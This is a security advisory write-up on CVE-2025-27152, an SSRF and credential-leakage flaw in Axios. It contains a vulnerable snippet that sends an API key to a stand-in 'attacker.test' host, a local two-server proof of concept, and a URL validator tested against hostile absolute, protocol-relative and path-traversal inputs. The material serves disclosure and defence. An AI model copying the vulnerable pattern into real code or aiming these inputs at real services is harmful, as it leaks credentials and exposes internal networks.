A critical security issue has been identified in the Axios package for JavaScript, which poses significant risks to millions of servers due to server-side request forgery (SSRF) and credential leakage.
This vulnerability occurs when absolute URLs are used in Axios requests, even when a base URL is specified.
CVE-2025-27152 Overview
The vulnerability in Axios is identified by the CVE ID CVE-2025-27152. It affects versions of Axios lower than or equal to 1.7.9 and has been rated with a moderate severity level.
import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// Example of an absolute URL being passed
const userId = "http://attacker.test/";

// SSRF Vulnerability Example
await internalAPIClient.get(userId); // Sends the request to http://attacker.test/ instead of the baseURL
In the code snippet above, even though a base URL is set for the Axios client, passing an absolute URL to the get() method results in the request being sent directly to the specified absolute URL.
This bypasses the intended security mechanisms, as sensitive credentials such as the X-API-KEY are included in the request headers and can be leaked to unintended hosts.
Proof of Concept
To demonstrate this vulnerability, a simple proof of concept (PoC) can be set up using two local HTTP servers.
- Set up the servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
- Create a test script (main.js):
import axios from "axios";

const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
- Run the script:
node main.js
The output will be "this is server2", indicating that the request was successfully redirected to the unintended server.
Impact and Mitigation
The vulnerability poses two main risks:
- Credential Leakage: Sensitive API keys or credentials might be exposed to third-party hosts if an absolute URL is passed.
- SSRF (Server-Side Request Forgery): Attackers can leverage this flaw to make unauthorized requests to internal network hosts.
To mitigate this risk, users should update to Axios version 1.8.2 or later, where the issue has been fixed. Additionally, implementing strict validation for any user-provided URLs is essential to prevent SSRF attacks.
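The following is an added example of such a pre-flight validation, not code from the advisory or from the Axios project: it refuses any user-supplied value that is not a plain relative path beneath the configured baseURL, so an absolute URL can never reach client.get(). It uses only Node's built-in WHATWG URL parser; the base URL and sample inputs are constructed for illustration.

```javascript
// Added example: validate a user-supplied request path before handing it to
// an Axios client that carries credentials. Constructed base URL, modelled on
// the advisory's snippet.
const BASE_URL = "http://example.test/api/v1/users/";

// Returns the fully resolved URL if `userInput` stays under `baseURL`,
// otherwise throws. Stricter than Axios' own isAbsoluteURL check: any
// scheme prefix (even without "//") is treated as absolute.
function resolveUnderBase(baseURL, userInput) {
  if (typeof userInput !== "string" || userInput.length === 0) {
    throw new Error("path must be a non-empty string");
  }
  // 1. A scheme prefix ("http:", "file:", "javascript:") means absolute.
  if (/^[a-z][a-z0-9+.-]*:/i.test(userInput)) {
    throw new Error("absolute URL rejected: " + userInput);
  }
  // 2. "//host" and "\\host" are protocol-relative (WHATWG treats "\" as "/"
  //    for http); "/x" would escape the base path. Only plain relative
  //    references are allowed past this point.
  if (/^[\\/]/.test(userInput)) {
    throw new Error("host- or root-relative path rejected: " + userInput);
  }
  // 3. Resolve against the base and confirm the result stayed put: same
  //    origin, and the path still begins with the base path (catches "..",
  //    including percent-encoded "%2e%2e" segments, which the parser decodes).
  const base = new URL(baseURL);
  const resolved = new URL(userInput, base);
  if (resolved.origin !== base.origin) {
    throw new Error("resolved to a different origin: " + resolved.origin);
  }
  if (!resolved.pathname.startsWith(base.pathname)) {
    throw new Error("path escaped the base: " + resolved.pathname);
  }
  return resolved.href;
}

// Demonstration over constructed inputs; the first two are accepted,
// the rest are blocked before any request would be made.
const samples = ["123", "123?verbose=1", "http://attacker.test/",
  "//attacker.test/", "../../admin", "\\\\attacker.test/", "%2e%2e/x"];
for (const s of samples) {
  try {
    console.log("ok    ", resolveUnderBase(BASE_URL, s));
  } catch (e) {
    console.log("block ", JSON.stringify(s), "->", e.message);
  }
}
```

In application code the validated string, not the raw input, is what gets passed to internalAPIClient.get().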
The vulnerability was reported by @lambdasawa on GitHub, underscoring the importance of community involvement in software security.
This recent security issue highlights the need for diligence in managing dependencies and validating inputs, especially with widely used libraries like Axios.
By updating to patched versions and implementing robust security practices, developers can protect their applications and internal networks from SSRF and credential leakage threats.